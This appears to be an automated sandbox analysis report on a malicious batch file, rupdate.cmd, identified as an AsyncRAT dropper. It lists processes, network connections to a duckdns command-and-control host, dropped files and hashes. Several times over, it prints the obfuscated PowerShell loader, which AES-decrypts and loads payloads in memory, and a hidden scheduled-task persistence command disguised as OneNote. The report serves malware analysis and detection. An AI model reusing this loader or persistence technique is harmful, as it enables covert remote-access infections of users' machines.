Analysis Overview
SHA256
ff563d075c5fc7628d94f0d8e4c3d594bb1cefb40faa995211d5bd854f87573b
Threat Level: Known bad
The file rupdate.cmd was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-03-11 20:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-11 20:01
Reported
2024-03-11 20:04
Platform
win7-20231129-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\rupdate.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\rupdate.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\rupdate.cmd';$LFwP='LQNtJoaQNtJdQNtJ'.Replace('QNtJ', ''),'MaUuFginUuFgMoUuFgdulUuFgeUuFg'.Replace('UuFg', ''),'DecZyHQomZyHQpZyHQreZyHQsZyHQsZyHQ'.Replace('ZyHQ', ''),'GetTcXjCuTcXjrrTcXjenTcXjtPTcXjrTcXjoceTcXjssTcXj'.Replace('TcXj', ''),'CrUcRReaUcRRteUcRRDeUcRRcUcRRrypUcRRtorUcRR'.Replace('UcRR', ''),'SplUzbpitUzbp'.Replace('Uzbp', ''),'CsyNPhansyNPgesyNPEsyNPxtesyNPnssyNPisyNPonsyNP'.Replace('syNP', ''),'EFsAOnFsAOtFsAOryPFsAOoFsAOintFsAO'.Replace('FsAO', ''),'FroJsEmmBaJsEmse6JsEm4SJsEmtriJsEmngJsEm'.Replace('JsEm', ''),'TrxpRKanxpRKsxpRKfoxpRKrxpRKmxpRKFixpRKnaxpRKlBlxpRKockxpRK'.Replace('xpRK', ''),'CoQQaApyTQQaAoQQaA'.Replace('QQaA', ''),'ReaRwuAdLiRwuAnRwuAesRwuA'.Replace('RwuA', ''),'EltBEnetBEnmentBEnttBEnAttBEn'.Replace('tBEn', ''),'Invsdpvosdpvkesdpv'.Replace('sdpv', '');powershell -w hidden;function vWWlW($sWOtr){$LeffD=[System.Security.Cryptography.Aes]::Create();$LeffD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LeffD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LeffD.Key=[System.Convert]::($LFwP[8])('7d4AFjj4qrImXG7jYt74EelSDmn179g+v8W/gWHYD+w=');$LeffD.IV=[System.Convert]::($LFwP[8])('h4A9PoLMYbrcJ9FDgep5DQ==');$BWzRm=$LeffD.($LFwP[4])();$RZsbQ=$BWzRm.($LFwP[9])($sWOtr,0,$sWOtr.Length);$BWzRm.Dispose();$LeffD.Dispose();$RZsbQ;}function uxFCF($sWOtr){$AxWJf=New-Object System.IO.MemoryStream(,$sWOtr);$ufEMe=New-Object System.IO.MemoryStream;$pwlbZ=New-Object System.IO.Compression.GZipStream($AxWJf,[IO.Compression.CompressionMode]::($LFwP[2]));$pwlbZ.($LFwP[10])($ufEMe);$pwlbZ.Dispose();$AxWJf.Dispose();$ufEMe.Dispose();$ufEMe.ToArray();}$ARkNi=[System.IO.File]::($LFwP[11])([Console]::Title);$qWGdG=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 5).Substring(2))));$cpVwN=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 
6).Substring(2))));[System.Reflection.Assembly]::($LFwP[0])([byte[]]$cpVwN).($LFwP[7]).($LFwP[13])($null,$null);[System.Reflection.Assembly]::($LFwP[0])([byte[]]$qWGdG).($LFwP[7]).($LFwP[13])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files
memory/2868-4-0x000000001B8A0000-0x000000001BB82000-memory.dmp
memory/2868-5-0x0000000001E00000-0x0000000001E08000-memory.dmp
memory/2868-6-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp
memory/2868-7-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2868-8-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp
memory/2868-9-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2868-11-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2868-10-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2868-12-0x000007FEF52A0000-0x000007FEF5C3D000-memory.dmp
memory/2868-13-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2868-14-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2868-15-0x0000000002D80000-0x0000000002E00000-memory.dmp
memory/2868-16-0x0000000002D80000-0x0000000002E00000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-11 20:01
Reported
2024-03-11 20:04
Platform
win10v2004-20240226-en
Max time kernel
142s
Max time network
156s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rupdate.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\rupdate.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\rupdate.cmd';$LFwP='LQNtJoaQNtJdQNtJ'.Replace('QNtJ', ''),'MaUuFginUuFgMoUuFgdulUuFgeUuFg'.Replace('UuFg', ''),'DecZyHQomZyHQpZyHQreZyHQsZyHQsZyHQ'.Replace('ZyHQ', ''),'GetTcXjCuTcXjrrTcXjenTcXjtPTcXjrTcXjoceTcXjssTcXj'.Replace('TcXj', ''),'CrUcRReaUcRRteUcRRDeUcRRcUcRRrypUcRRtorUcRR'.Replace('UcRR', ''),'SplUzbpitUzbp'.Replace('Uzbp', ''),'CsyNPhansyNPgesyNPEsyNPxtesyNPnssyNPisyNPonsyNP'.Replace('syNP', ''),'EFsAOnFsAOtFsAOryPFsAOoFsAOintFsAO'.Replace('FsAO', ''),'FroJsEmmBaJsEmse6JsEm4SJsEmtriJsEmngJsEm'.Replace('JsEm', ''),'TrxpRKanxpRKsxpRKfoxpRKrxpRKmxpRKFixpRKnaxpRKlBlxpRKockxpRK'.Replace('xpRK', ''),'CoQQaApyTQQaAoQQaA'.Replace('QQaA', ''),'ReaRwuAdLiRwuAnRwuAesRwuA'.Replace('RwuA', ''),'EltBEnetBEnmentBEnttBEnAttBEn'.Replace('tBEn', ''),'Invsdpvosdpvkesdpv'.Replace('sdpv', '');powershell -w hidden;function vWWlW($sWOtr){$LeffD=[System.Security.Cryptography.Aes]::Create();$LeffD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LeffD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LeffD.Key=[System.Convert]::($LFwP[8])('7d4AFjj4qrImXG7jYt74EelSDmn179g+v8W/gWHYD+w=');$LeffD.IV=[System.Convert]::($LFwP[8])('h4A9PoLMYbrcJ9FDgep5DQ==');$BWzRm=$LeffD.($LFwP[4])();$RZsbQ=$BWzRm.($LFwP[9])($sWOtr,0,$sWOtr.Length);$BWzRm.Dispose();$LeffD.Dispose();$RZsbQ;}function uxFCF($sWOtr){$AxWJf=New-Object System.IO.MemoryStream(,$sWOtr);$ufEMe=New-Object System.IO.MemoryStream;$pwlbZ=New-Object System.IO.Compression.GZipStream($AxWJf,[IO.Compression.CompressionMode]::($LFwP[2]));$pwlbZ.($LFwP[10])($ufEMe);$pwlbZ.Dispose();$AxWJf.Dispose();$ufEMe.Dispose();$ufEMe.ToArray();}$ARkNi=[System.IO.File]::($LFwP[11])([Console]::Title);$qWGdG=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 5).Substring(2))));$cpVwN=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 
6).Substring(2))));[System.Reflection.Assembly]::($LFwP[0])([byte[]]$cpVwN).($LFwP[7]).($LFwP[13])($null,$null);[System.Reflection.Assembly]::($LFwP[0])([byte[]]$qWGdG).($LFwP[7]).($LFwP[13])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\rupdate')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 62112' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\strt.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\strt.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\strt.cmd';$LFwP='LQNtJoaQNtJdQNtJ'.Replace('QNtJ', ''),'MaUuFginUuFgMoUuFgdulUuFgeUuFg'.Replace('UuFg', ''),'DecZyHQomZyHQpZyHQreZyHQsZyHQsZyHQ'.Replace('ZyHQ', ''),'GetTcXjCuTcXjrrTcXjenTcXjtPTcXjrTcXjoceTcXjssTcXj'.Replace('TcXj', ''),'CrUcRReaUcRRteUcRRDeUcRRcUcRRrypUcRRtorUcRR'.Replace('UcRR', ''),'SplUzbpitUzbp'.Replace('Uzbp', ''),'CsyNPhansyNPgesyNPEsyNPxtesyNPnssyNPisyNPonsyNP'.Replace('syNP', ''),'EFsAOnFsAOtFsAOryPFsAOoFsAOintFsAO'.Replace('FsAO', ''),'FroJsEmmBaJsEmse6JsEm4SJsEmtriJsEmngJsEm'.Replace('JsEm', ''),'TrxpRKanxpRKsxpRKfoxpRKrxpRKmxpRKFixpRKnaxpRKlBlxpRKockxpRK'.Replace('xpRK', ''),'CoQQaApyTQQaAoQQaA'.Replace('QQaA', ''),'ReaRwuAdLiRwuAnRwuAesRwuA'.Replace('RwuA', ''),'EltBEnetBEnmentBEnttBEnAttBEn'.Replace('tBEn', ''),'Invsdpvosdpvkesdpv'.Replace('sdpv', '');powershell -w hidden;function vWWlW($sWOtr){$LeffD=[System.Security.Cryptography.Aes]::Create();$LeffD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LeffD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LeffD.Key=[System.Convert]::($LFwP[8])('7d4AFjj4qrImXG7jYt74EelSDmn179g+v8W/gWHYD+w=');$LeffD.IV=[System.Convert]::($LFwP[8])('h4A9PoLMYbrcJ9FDgep5DQ==');$BWzRm=$LeffD.($LFwP[4])();$RZsbQ=$BWzRm.($LFwP[9])($sWOtr,0,$sWOtr.Length);$BWzRm.Dispose();$LeffD.Dispose();$RZsbQ;}function uxFCF($sWOtr){$AxWJf=New-Object System.IO.MemoryStream(,$sWOtr);$ufEMe=New-Object System.IO.MemoryStream;$pwlbZ=New-Object System.IO.Compression.GZipStream($AxWJf,[IO.Compression.CompressionMode]::($LFwP[2]));$pwlbZ.($LFwP[10])($ufEMe);$pwlbZ.Dispose();$AxWJf.Dispose();$ufEMe.Dispose();$ufEMe.ToArray();}$ARkNi=[System.IO.File]::($LFwP[11])([Console]::Title);$qWGdG=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 5).Substring(2))));$cpVwN=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 
6).Substring(2))));[System.Reflection.Assembly]::($LFwP[0])([byte[]]$cpVwN).($LFwP[7]).($LFwP[13])($null,$null);[System.Reflection.Assembly]::($LFwP[0])([byte[]]$qWGdG).($LFwP[7]).($LFwP[13])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\strt')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 62112' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1028 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 13.107.253.67:443 | | tcp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | momentdhs.duckdns.org | udp |
| GB | 154.30.255.175:8897 | momentdhs.duckdns.org | tcp |
| US | 8.8.8.8:53 | 175.255.30.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 209.80.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jvp3zyqb.5ld.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1728-5-0x00000119B4740000-0x00000119B4762000-memory.dmp
memory/1728-10-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/1728-11-0x00000119B4630000-0x00000119B4640000-memory.dmp
memory/1728-12-0x00000119B4630000-0x00000119B4640000-memory.dmp
memory/1728-13-0x00000119B4B60000-0x00000119B4BA4000-memory.dmp
memory/1728-14-0x00000119B4C30000-0x00000119B4CA6000-memory.dmp
memory/932-15-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/932-16-0x000002C1B34C0000-0x000002C1B34D0000-memory.dmp
memory/932-17-0x000002C1B34C0000-0x000002C1B34D0000-memory.dmp
memory/932-27-0x000002C1B34C0000-0x000002C1B34D0000-memory.dmp
memory/932-30-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/1728-31-0x00000119B4B30000-0x00000119B4B3A000-memory.dmp
memory/1728-32-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/1728-33-0x00000119B4B40000-0x00000119B4B50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3f01549ee3e4c18244797530b588dad9 |
| SHA1 | 3e87863fc06995fe4b741357c68931221d6cc0b9 |
| SHA256 | 36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a |
| SHA512 | 73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50 |
memory/2440-35-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/1728-36-0x00000119B4630000-0x00000119B4640000-memory.dmp
memory/1728-42-0x00000119B4630000-0x00000119B4640000-memory.dmp
memory/2440-47-0x0000022DA8F80000-0x0000022DA8F90000-memory.dmp
memory/2440-48-0x0000022DA8F80000-0x0000022DA8F90000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | a26df49623eff12a70a93f649776dab7 |
| SHA1 | efb53bd0df3ac34bd119adf8788127ad57e53803 |
| SHA256 | 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245 |
| SHA512 | e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c |
memory/2440-52-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/2508-53-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/2508-54-0x000001975D5F0000-0x000001975D600000-memory.dmp
memory/2508-55-0x000001975D5F0000-0x000001975D600000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cc2ce575753731574bf10ff6e5162032 |
| SHA1 | b660e5156f97af770e5d359fdd2a6ea697f359fb |
| SHA256 | c0c37fd6fb26d101e347a1e9b5190029bb591d8c57392dbf2df4741b11fc2dfa |
| SHA512 | 715bb49c3977d51ff39b0458b99c5e3ba786e3110a4015402cd023b484ff385704475238fb813d074524d76bc733b0d4e92b57b64d187b3d6a664e4f38eebc1b |
memory/2508-66-0x000001975D5F0000-0x000001975D600000-memory.dmp
memory/2508-67-0x000001975D5F0000-0x000001975D600000-memory.dmp
memory/2508-69-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 2d1de0141861c4d15f5dc0630d1b8c94 |
| SHA1 | 523a8ce3c9a1d5058f77cda094ffd171ff3e4ab8 |
| SHA256 | 94738f7eb08a96b49fb7c51091083b9401b99e4db6458625bd3f1f6c65838c36 |
| SHA512 | 354f89f30f47d909c953d0451d8f1f850f585cd8580241c46d62fbdd3089ddbe3775fe7e531abb9a766683477a32116a52bffe0aa8f7b1d443edfa8baf592498 |
C:\Users\Admin\AppData\Roaming\strt.cmd
| MD5 | e2c6aa50d199d28c6c91c31f4a0cecad |
| SHA1 | 281110edb18aa02b0f7bda95842bbfc89fa18df3 |
| SHA256 | ff563d075c5fc7628d94f0d8e4c3d594bb1cefb40faa995211d5bd854f87573b |
| SHA512 | 769f9fdff4bb299047733cc899303b1c4af2db0c72dba2aa13c7f1635c8256ee3e06a5ff46755f6c337fb4a87ae0c6d07288cc21fba84d2fa54800a8553a75cf |
memory/3544-74-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/3544-75-0x0000022B1A350000-0x0000022B1A360000-memory.dmp
memory/3544-81-0x0000022B1A350000-0x0000022B1A360000-memory.dmp
memory/3544-87-0x0000022B1A350000-0x0000022B1A360000-memory.dmp
memory/1728-88-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/2528-89-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/2528-95-0x0000022C640A0000-0x0000022C640B0000-memory.dmp
memory/2528-100-0x0000022C640A0000-0x0000022C640B0000-memory.dmp
memory/2528-102-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/4224-103-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/4224-104-0x00000270A7FC0000-0x00000270A7FD0000-memory.dmp
memory/4224-114-0x00000270A7FC0000-0x00000270A7FD0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a9c8558fc395b97560496609cfb8c2b9 |
| SHA1 | 4b4245ffc0a5a886d3b1db9bc8621d24e578c39a |
| SHA256 | 45cfc42df83d0e0dbfecaea4d181c5378277dd83a661878412c7daf7d31eff3b |
| SHA512 | 1a41d1b1de9081b3e7b0ed4e3f0104d6207251434c4298e9d9a5257da1bd070e32511fc3093746324c6eea471f38205df95e1768d4531def33c903a8476a1cf1 |
memory/4224-117-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/4772-118-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/4772-128-0x000001CABD0E0000-0x000001CABD0F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2114288fdfc8e55f47611663569c81ab |
| SHA1 | b90e27b1223903c32b629ba98f237ff177ccce85 |
| SHA256 | 5d413dcfcf1f7570834cb23652183db100ab5213b4c7a40ac2c8849c2f5bf69a |
| SHA512 | 997e2b423b8b186b8e02114f52f56d560040705a77aa4c837fa49e003116523d049481625c68e2a96b2327f733af02b40b415ac1530a385ddddb4c4b20a8df8d |
memory/3544-130-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/3544-131-0x0000022B1A350000-0x0000022B1A360000-memory.dmp
memory/3544-132-0x0000022B1A350000-0x0000022B1A360000-memory.dmp
memory/4772-134-0x00007FFFD5EF0000-0x00007FFFD69B1000-memory.dmp
memory/3544-135-0x0000022B33020000-0x0000022B33036000-memory.dmp
memory/3544-136-0x00007FFFF6CB0000-0x00007FFFF6EA5000-memory.dmp
memory/3544-139-0x00007FFFE1510000-0x00007FFFE1529000-memory.dmp
memory/3544-140-0x00007FFFF6CB0000-0x00007FFFF6EA5000-memory.dmp